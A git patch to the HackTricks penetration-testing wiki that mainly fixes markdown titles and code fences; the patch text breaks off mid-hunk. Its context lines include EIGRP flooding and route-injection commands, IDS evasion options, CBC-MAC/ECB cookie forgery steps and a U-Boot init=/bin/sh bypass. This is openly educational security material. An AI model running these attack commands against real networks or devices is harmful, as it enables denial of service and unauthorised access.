From 827e6354daef7c41453760b341e2019f16501441 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Tue, 8 Jul 2025 13:28:53 +0200 Subject: [PATCH] fix some titles --- src/SUMMARY.md | 3 - .../README.md | 2 + .../blockchain-and-crypto-currencies.md | 2 + .../cipher-block-chaining-cbc-mac-priv.md | 10 +- .../unpacking-binaries.md | 6 +- .../electronic-code-book-ecb.md | 12 ++- .../rc4-encrypt-and-decrypt.md | 2 + src/generic-hacking/reverse-shells/README.md | 12 ++- .../file-integrity-monitoring.md | 8 +- .../README.md | 2 + .../desofuscation-vbs-cscript.exe.md | 2 + .../png-tricks.md | 2 + .../video-and-audio-file-analysis.md | 2 + .../pentesting-network/dhcpv6.md | 2 + .../pentesting-network/eigrp-attacks.md | 16 ++-- .../pentesting-network/ids-evasion.md | 16 ++-- .../network-protocols-explained-esp.md | 2 + .../pentesting-network/pentesting-ipv6.md | 28 +++--- .../phishing-methodology/clone-a-website.md | 2 + .../python/bruteforce-hash-few-chars.md | 2 + .../firmware-analysis/bootloader-testing.md | 10 +- .../firmware-analysis/firmware-integrity.md | 4 +- ...uthn-docker-access-authorization-plugin.md | 42 ++++---- ...se_agent-exploit-relative-paths-to-pids.md | 4 +- .../sensitive-mounts.md | 6 +- .../privilege-escalation/logstash.md | 2 + .../nfs-no_root_squash-misconfiguration-pe.md | 18 ++-- .../privilege-escalation/selinux.md | 6 +- .../socket-command-injection.md | 2 + .../ssh-forward-agent-exploitation.md | 8 +- .../wildcards-spare-tricks.md | 2 + .../macos-bundles.md | 5 +- .../android-app-pentesting/adb-commands.md | 48 +++++----- .../content-protocol.md | 2 + .../intent-injection.md | 2 + .../make-apk-accept-ca-certificate.md | 6 +- .../manual-deobfuscation.md | 2 + .../react-native-application.md | 8 +- .../spoofing-your-location-in-play-store.md | 2 + .../ios-pentesting/ios-basics.md | 24 ++--- .../ios-hooking-with-objection.md | 22 +++-- .../ios-pentesting/ios-protocol-handlers.md | 5 +- .../ios-serialisation-and-encoding.md | 2 + .../ios-pentesting/ios-uipasteboard.md | 2 + ...0-network-data-management-protocol-ndmp.md | 6 +- ...-24008-24009-49152-pentesting-glusterfs.md | 4 +- .../3128-pentesting-squid.md | 12 ++- .../3299-pentesting-saprouter.md | 2 + .../3632-pentesting-distcc.md | 10 +- .../3690-pentesting-subversion-svn-server.md | 6 +- ...ntesting-erlang-port-mapper-daemon-epmd.md | 20 ++-- .../44134-pentesting-tiller-helm.md | 8 +- .../44818-ethernetip.md | 8 +- .../47808-udp-bacnet.md | 12 ++- ...060-50070-50075-50090-pentesting-hadoop.md | 4 +- .../515-pentesting-line-printer-daemon-lpd.md | 8 +- .../5601-pentesting-kibana.md | 10 +- .../69-udp-tftp.md | 11 ++- .../7-tcp-udp-pentesting-echo.md | 4 +- .../9000-pentesting-fastcgi.md | 6 +- .../9001-pentesting-hsqldb.md | 20 ++-- src/network-services-pentesting/9100-pjl.md | 12 ++- .../pentesting-264-check-point-firewall-1.md | 6 +- ...ting-631-internet-printing-protocol-ipp.md | 4 +- .../pentesting-compaq-hp-insight-manager.md | 6 +- .../ftp-bounce-download-2oftp-file.md | 4 +- .../harvesting-tickets-from-linux.md | 2 + .../pentesting-modbus.md | 6 +- .../pentesting-sap.md | 20 ++-- .../pentesting-snmp/snmp-rce.md | 4 +- .../aem-adobe-experience-cloud.md | 2 + .../artifactory-hacking-guide.md | 2 + .../pentesting-web/cgi.md | 14 +-- .../pentesting-web/golang.md | 2 + .../disable_functions-bypass-dl-function.md | 2 + ...than-3.3.0-php-greater-than-5.4-exploit.md | 3 +- .../disable_functions-bypass-mod_cgi.md | 3 +- ...p-4-greater-than-4.2.0-php-5-pcntl_exec.md | 3 +- ..._functions-bypass-php-5.2-fopen-exploit.md | 3 +- ...p-5.2.3-win32std-ext-protections-bypass.md | 3 +- ...ons-bypass-php-5.2.4-and-5.2.5-php-curl.md | 3 +- ...s-bypass-php-less-than-5.2.9-on-windows.md | 3 +- ...perl-extension-safe_mode-bypass-exploit.md | 3 +- ...roc_open-and-custom-environment-exploit.md | 4 +- .../disable_functions-bypass-via-mem.md | 4 +- ...ons-php-5.2.4-ioncube-extension-exploit.md | 3 +- ...le_functions-php-5.x-shellshock-exploit.md | 4 +- .../pentesting-web/vmware-esx-vcenter....md | 6 +- ...ypass-self-+-unsafe-inline-with-iframes.md | 6 +- src/pentesting-web/deserialization/README.md | 2 +- ...ialization-objectinputstream-readobject.md | 6 +- ...ploiting-__viewstate-knowing-the-secret.md | 2 + ...va-jsf-viewstate-.faces-deserialization.md | 2 + .../file-inclusion/lfi2rce-via-phpinfo.md | 2 + .../lfi2rce-via-temp-file-uploads.md | 6 +- .../hacking-with-cookies/cookie-bomb.md | 2 + .../cookie-jar-overflow.md | 2 + src/pentesting-web/idor.md | 2 + .../login-bypass/sql-login-bypass.md | 2 + src/pentesting-web/reverse-tab-nabbing.md | 16 ++-- .../saml-attacks/saml-basics.md | 14 +-- .../big-binary-files-upload-postgresql.md | 6 +- src/pentesting-web/sql-injection/sqlmap.md | 37 ++++---- .../sqlmap/second-order-injection-sqlmap.md | 2 + .../xss-cross-site-scripting/pdf-injection.md | 2 + .../angr/README.md | 30 +++--- .../blobrunner.md | 2 + .../satisfiability-modulo-theories-smt-z3.md | 20 ++-- src/reversing/reversing-tools/README.md | 24 ++--- src/todo/6881-udp-pentesting-bittorrent.md | 6 -- src/todo/burp-suite.md | 4 +- src/todo/interesting-http.md | 10 +- src/todo/misc.md | 2 + src/todo/more-tools.md | 14 +-- src/todo/pentesting-dns.md | 12 --- src/todo/post-exploitation.md | 2 + src/todo/references.md | 95 ------------------- .../ad-information-in-printers.md | 2 + .../active-directory-methodology/dcshadow.md | 5 +- .../dsrm-credentials.md | 4 +- src/windows-hardening/mythic.md | 6 +- .../stealing-credentials/wts-impersonator.md | 2 + ...ectory-permission-over-service-registry.md | 2 + .../create-msi-with-wix.md | 4 +- ...igh-integrity-to-system-with-name-pipes.md | 2 + .../integrity-levels.md | 2 +- .../sedebug-+-seimpersonate-copy-token.md | 3 + .../windows-c-payloads.md | 4 +- 128 files changed, 557 insertions(+), 460 deletions(-) delete mode 100644 src/todo/6881-udp-pentesting-bittorrent.md delete mode 100644 src/todo/pentesting-dns.md delete mode 100644 src/todo/references.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 4d3184b5e..a513d96de 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -856,11 +856,9 @@ # ✍️ TODO - [Interesting Http](todo/interesting-http.md) -- [Other Big References](todo/references.md) - [Rust Basics](todo/rust-basics.md) - [More Tools](todo/more-tools.md) - [MISC](todo/misc.md) -- [Pentesting DNS](todo/pentesting-dns.md) - [Hardware Hacking](todo/hardware-hacking/README.md) - [Fault Injection Attacks](todo/hardware-hacking/fault_injection_attacks.md) - [I2C](todo/hardware-hacking/i2c.md) @@ -892,7 +890,6 @@ - [Interesting HTTP$$external:todo/interesting-http.md$$]() - [Android Forensics](todo/android-forensics.md) - [TR-069](todo/tr-069.md) -- [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md) - [Online Platforms with API](todo/online-platforms-with-api.md) - [Stealing Sensitive Information Disclosure from a Web](todo/stealing-sensitive-information-disclosure-from-a-web.md) - [Post Exploitation](todo/post-exploitation.md) diff --git a/src/blockchain/blockchain-and-crypto-currencies/README.md b/src/blockchain/blockchain-and-crypto-currencies/README.md index c45957447..7f4c02712 100644 --- a/src/blockchain/blockchain-and-crypto-currencies/README.md +++ b/src/blockchain/blockchain-and-crypto-currencies/README.md @@ -1,3 +1,5 @@ +# Blockchain and Crypto-Currencies + {{#include ../../banners/hacktricks-training.md}} ## Basic Concepts diff --git a/src/crypto-and-stego/blockchain-and-crypto-currencies.md b/src/crypto-and-stego/blockchain-and-crypto-currencies.md index bc2ade55c..7bdd05ed9 100644 --- a/src/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/src/crypto-and-stego/blockchain-and-crypto-currencies.md @@ -1,3 +1,5 @@ +# Blockchain and Crypto Currencies + {{#include ../banners/hacktricks-training.md}} ## Basic Concepts diff --git a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index 5971c1cda..3368060f0 100644 --- a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md +++ b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md @@ -1,10 +1,12 @@ +# Cipher Block Chaining (CBC) and CBC-MAC Privilege Escalation + {{#include ../banners/hacktricks-training.md}} -# CBC +## CBC If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie. -# CBC-MAC +## CBC-MAC **Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security. @@ -12,7 +14,7 @@ To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero init ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png]() -# Vulnerability +## Vulnerability With CBC-MAC usually the **IV used is 0**.\ This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So: @@ -42,7 +44,7 @@ now, you can use s32 as the signature of the full name **Administrator**. 2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.** 3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**. -# Attack Controlling IV +## Attack Controlling IV If you can control the used IV the attack could be very easy.\ If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\ diff --git a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md index 9132f1946..6a1414553 100644 --- a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md +++ b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md @@ -1,6 +1,8 @@ +# Unpacking Binaries + {{#include ../../banners/hacktricks-training.md}} -# Identifying packed binaries +## Identifying packed binaries - **lack of strings**: It's common to find that packed binaries doesn't have almost any string - A lot of **unused strings**: Also, when a malware is using some kind of commercial packer it's common to find a lot of strings without cross-references. Even if these strings exist that doesn't mean that the binary isn't packed. @@ -9,7 +11,7 @@ - [Exeinfo PE](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/ExEinfo-PE.shtml) - [Language 2000](http://farrokhi.net/language/) -# Basic Recommendations +## Basic Recommendations - **Start** analysing the packed binary **from the bottom in IDA and move up**. Unpackers exit once the unpacked code exit so it's unlikely that the unpacker passes execution to the unpacked code at the start. - Search for **JMP's** or **CALLs** to **registers** or **regions** of **memory**. Also search for **functions pushing arguments and an address direction and then calling `retn`**, because the return of the function in that case may call the address just pushed to the stack before calling it. diff --git a/src/crypto-and-stego/electronic-code-book-ecb.md b/src/crypto-and-stego/electronic-code-book-ecb.md index c01107bc4..a3731d315 100644 --- a/src/crypto-and-stego/electronic-code-book-ecb.md +++ b/src/crypto-and-stego/electronic-code-book-ecb.md @@ -1,6 +1,8 @@ +# Electronic Code Book (ECB) + {{#include ../banners/hacktricks-training.md}} -# ECB +## ECB (ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key. @@ -11,7 +13,7 @@ Using ECB has multiple security implications: - **Blocks from encrypted message can be removed** - **Blocks from encrypted message can be moved around** -# Detection of the vulnerability +## Detection of the vulnerability Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`|`**.\ Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\ @@ -37,9 +39,9 @@ Now, the attacker just need to discover if the format is `< | 4 | 4 | 8 | 16 | | 7 | 7 | 14 | 16 | -# Exploitation of the vulnerability +## Exploitation of the vulnerability -## Removing entire blocks +### Removing entire blocks Knowing the format of the cookie (`|`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it: @@ -54,7 +56,7 @@ Then, you can remove the first block of 8B and you will et a valid cookie for th \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -## Moving blocks +### Moving blocks In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_ diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index b96787d2e..03f094366 100644 --- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -1,3 +1,5 @@ +# RC4 Encrypt and Decrypt + {{#include ../banners/hacktricks-training.md}} If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function. diff --git a/src/generic-hacking/reverse-shells/README.md b/src/generic-hacking/reverse-shells/README.md index 248a21a77..cf7900638 100644 --- a/src/generic-hacking/reverse-shells/README.md +++ b/src/generic-hacking/reverse-shells/README.md @@ -1,14 +1,16 @@ +# Reverse Shells + {{#include ../../banners/hacktricks-training.md}} -# [**Shells - Linux**](linux.md) +## [**Shells - Linux**](linux.md) -# [**Shells - Windows**](windows.md) +## [**Shells - Windows**](windows.md) -# [**MSFVenom - CheatSheet**](msfvenom.md) +## [**MSFVenom - CheatSheet**](msfvenom.md) -# [**Full TTYs**](full-ttys.md) +## [**Full TTYs**](full-ttys.md) -# **Auto-generated shells** +## **Auto-generated shells** - [**https://reverse-shell.sh/**](https://reverse-shell.sh/) - [**https://www.revshells.com/**](https://www.revshells.com/) diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index a01d62b33..e3924fd0a 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,20 +1,22 @@ +# File Integrity Monitoring + {{#include ../../banners/hacktricks-training.md}} -# Baseline +## Baseline A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**. For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\ This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all. -## File Integrity Monitoring +### File Integrity Monitoring File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps: 1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications. 2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions. -## Tools +### Tools - [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) - [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index d23a7ab56..e5e497ee7 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,3 +1,5 @@ +# Specific Software/File Type Tricks + {{#include ../../../banners/hacktricks-training.md}} Here you can find interesting tricks for specific file-types and/or software: diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index 08b84952d..4023160b1 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,3 +1,5 @@ +# Desobfuscation Techniques for VBS Files + {{#include ../../../banners/hacktricks-training.md}} Some things that could be useful to debug/deobfuscate a malicious VBS file: diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 64726e83d..567751d68 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,3 +1,5 @@ +# PNG Tricks + {{#include ../../../banners/hacktricks-training.md}} **PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies. diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 9dde6a953..41f3482bf 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,3 +1,5 @@ +# Video and Audio File Analysis + {{#include ../../../banners/hacktricks-training.md}} **Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types. diff --git a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index 07801a20d..c5b4964eb 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,3 +1,5 @@ +# DHCPv6 + {{#include ../../banners/hacktricks-training.md}} ### DHCPv6 vs. DHCPv4 Message Types Comparison diff --git a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index 855103ab1..bb64aa796 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -9,9 +9,9 @@ - **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack. - **Tool**: **helloflooding.py** script. - **Execution**: - %%%bash + ```bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 - %%% + ``` - **Parameters**: - `--interface`: Specifies the network interface, e.g., `eth0`. - `--as`: Defines the EIGRP autonomous system number, e.g., `1`. @@ -22,9 +22,9 @@ - **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination. - **Tool**: **routeinject.py** script. - **Execution**: - %%%bash + ```bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 - %%% + ``` - **Parameters**: - `--interface`: Specifies the attacker’s system interface. - `--as`: Defines the EIGRP AS number. @@ -37,9 +37,9 @@ - **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack. - **Tool**: **relationshipnightmare.py** script. - **Execution**: - %%%bash + ```bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 - %%% + ``` - **Parameters**: - `--interface`: Specifies the network interface. - `--as`: Defines the EIGRP AS number. @@ -50,9 +50,9 @@ - **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes. - **Tool**: **routingtableoverflow.py** script. - **Execution**: - %%%bash + ```bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 - %%% + ``` - **Parameters**: - `--interface`: Specifies the network interface. - `--as`: Defines the EIGRP AS number. diff --git a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index c86063da7..0ee5e68bb 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,35 +1,37 @@ +# IDS/IPS Evasion Techniques + {{#include ../../banners/hacktricks-training.md}} -# **TTL Manipulation** +## **TTL Manipulation** Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content. **Nmap option:** `--ttlvalue ` -# Avoiding signatures +## Avoiding signatures Just add garbage data to the packets so the IPS/IDS signature is avoided. **Nmap option:** `--data-length 25` -# **Fragmented Packets** +## **Fragmented Packets** Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host. **Nmap option:** `-f` -# **Invalid** _**checksum**_ +## **Invalid** _**checksum**_ Sensors usually don't calculate checksum for performance reasons. So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example: Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid. -# **Uncommon IP and TCP options** +## **Uncommon IP and TCP options** A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt. -# **Overlapping** +## **Overlapping** It is possible that when you fragment a packet, some kind of overlapping exists between packets (maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3). Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.\ Or maybe, 2 packets with the same offset comes and the host has to decide which one it takes. @@ -39,7 +41,7 @@ Or maybe, 2 packets with the same offset comes and the host has to decide which - **First** (Windows): First value that comes, value that stays. - **Last** (cisco): Last value that comes, value that stays. -# Tools +## Tools - [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) diff --git a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index 5a9ff6dc1..b2c302aa2 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -1,3 +1,5 @@ +# Network Protocols + {{#include ../../banners/hacktricks-training.md}} ## Multicast DNS (mDNS) diff --git a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md index 75812e427..bede07f64 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md @@ -1,8 +1,10 @@ +# Pentesting IPv6 + {{#include ../../banners/hacktricks-training.md}} -# IPv6 Basic theory +## IPv6 Basic theory -## Networks +### Networks IPv6 addresses are structured to enhance network organization and device interaction. An IPv6 address is divided into: @@ -40,7 +42,7 @@ alive6 eth0 IPv6 addresses can be derived from a device's MAC address for local communication. Here's a simplified guide on how to derive the Link-local IPv6 address from a known MAC address, and a brief overview of IPv6 address types and methods to discover IPv6 addresses within a network. -## **Deriving Link-local IPv6 from MAC Address** +### **Deriving Link-local IPv6 from MAC Address** Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IPv6 address as follows: @@ -48,13 +50,13 @@ Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IP 2. Prepend `fe80::` and insert `fffe` in the middle: **`fe80::1234:56ff:fe78:9abc`** 3. Invert the seventh bit from the left, changing `1234` to `1034`: **`fe80::1034:56ff:fe78:9abc`** -## **IPv6 Address Types** +### **IPv6 Address Types** - **Unique Local Address (ULA)**: For local communications, not meant for public internet routing. Prefix: **`FEC00::/7`** - **Multicast Address**: For one-to-many communication. Delivered to all interfaces in the multicast group. Prefix: **`FF00::/8`** - **Anycast Address**: For one-to-nearest communication. Sent to the closest interface as per routing protocol. Part of the **`2000::/3`** global unicast range. -## **Address Prefixes** +### **Address Prefixes** - **fe80::/10**: Link-Local addresses (similar to 169.254.x.x) - **fc00::/7**: Unique Local-Unicast (similar to private IPv4 ranges like 10.x.x.x, 172.16.x.x, 192.168.x.x) @@ -62,14 +64,14 @@ Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IP - **ff02::1**: Multicast All Nodes - **ff02::2**: Multicast Router Nodes -## **Discovering IPv6 Addresses within a Network** +### **Discovering IPv6 Addresses within a Network** -### Way 1: Using Link-local Addresses +#### Way 1: Using Link-local Addresses 1. Obtain the MAC address of a device within the network. 2. Derive the Link-local IPv6 address from the MAC address. -### Way 2: Using Multicast +#### Way 2: Using Multicast 1. Send a ping to the multicast address `ff02::1` to discover IPv6 addresses on the local network. @@ -79,7 +81,7 @@ ping6 -I ff02::1 # Send a ping to multicast address ip -6 neigh # Display the neighbor table ``` -## IPv6 Man-in-the-Middle (MitM) Attacks +### IPv6 Man-in-the-Middle (MitM) Attacks Several techniques exist for executing MitM attacks in IPv6 networks, such as: @@ -88,9 +90,9 @@ Several techniques exist for executing MitM attacks in IPv6 networks, such as: - Attacking mobile IPv6 (usually requires IPSec to be disabled). - Setting up a rogue DHCPv6 server. -# Identifying IPv6 Addresses in the eild +## Identifying IPv6 Addresses in the eild -## Exploring Subdomains +### Exploring Subdomains A method to find subdomains that are potentially linked to IPv6 addresses involves leveraging search engines. For instance, employing a query pattern like `ipv6.*` can be effective. Specifically, the following search command can be used in Google: @@ -98,7 +100,7 @@ A method to find subdomains that are potentially linked to IPv6 addresses involv site:ipv6./ ``` -## Utilizing DNS Queries +### Utilizing DNS Queries To identify IPv6 addresses, certain DNS record types can be queried: @@ -106,7 +108,7 @@ To identify IPv6 addresses, certain DNS record types can be queried: - **AAAA**: Directly seeks out IPv6 addresses. - **ANY**: A broad query that returns all available DNS records. -## Probing with Ping6 +### Probing with Ping6 After pinpointing IPv6 addresses associated with an organization, the `ping6` utility can be used for probing. This tool helps in assessing the responsiveness of identified IPv6 addresses, and might also assist in discovering adjacent IPv6 devices. diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md b/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md index 2150ed64e..b0b64c916 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md @@ -1,3 +1,5 @@ +# Cloning a Website + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md b/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md index b14f18f07..6b983a935 100644 --- a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md +++ b/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md @@ -1,3 +1,5 @@ +# Bruteforce Hash Few Chars + {{#include ../../banners/hacktricks-training.md}} ```python diff --git a/src/hardware-physical-access/firmware-analysis/bootloader-testing.md b/src/hardware-physical-access/firmware-analysis/bootloader-testing.md index 04c704023..78b21d495 100644 --- a/src/hardware-physical-access/firmware-analysis/bootloader-testing.md +++ b/src/hardware-physical-access/firmware-analysis/bootloader-testing.md @@ -1,3 +1,5 @@ +# Bootloader Testing + {{#include ../../banners/hacktricks-training.md}} The following steps are recommended for modifying device startup configurations and bootloaders like U-boot: @@ -9,24 +11,24 @@ The following steps are recommended for modifying device startup configurations 2. **Modify Boot Arguments**: - Execute the following commands to append '`init=/bin/sh`' to the boot arguments, allowing execution of a shell command: - %%% + ``` #printenv #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash: rootfstype= hasEeprom=0 5srst=0 init=/bin/sh #saveenv #boot - %%% + ``` 3. **Setup TFTP Server**: - Configure a TFTP server to load images over a local network: - %%% + ``` #setenv ipaddr 192.168.2.2 #local IP of the device #setenv serverip 192.168.2.1 #TFTP server IP #saveenv #reset #ping 192.168.2.1 #check network access #tftp ${loadaddr} uImage-3.6.35 #loadaddr takes the address to load the file into and the filename of the image on the TFTP server - %%% + ``` 4. **Utilize `ubootwrite.py`**: diff --git a/src/hardware-physical-access/firmware-analysis/firmware-integrity.md b/src/hardware-physical-access/firmware-analysis/firmware-integrity.md index f91b17398..a74d069b8 100644 --- a/src/hardware-physical-access/firmware-analysis/firmware-integrity.md +++ b/src/hardware-physical-access/firmware-analysis/firmware-integrity.md @@ -1,6 +1,6 @@ -{{#include ../../banners/hacktricks-training.md}} +# Firmware Integrity -## Firmware Integrity +{{#include ../../banners/hacktricks-training.md}} The **custom firmware and/or compiled binaries can be uploaded to exploit integrity or signature verification flaws**. The following steps can be followed for backdoor bind shell compilation: diff --git a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md index 8cea7bebe..6d79db9cb 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md +++ 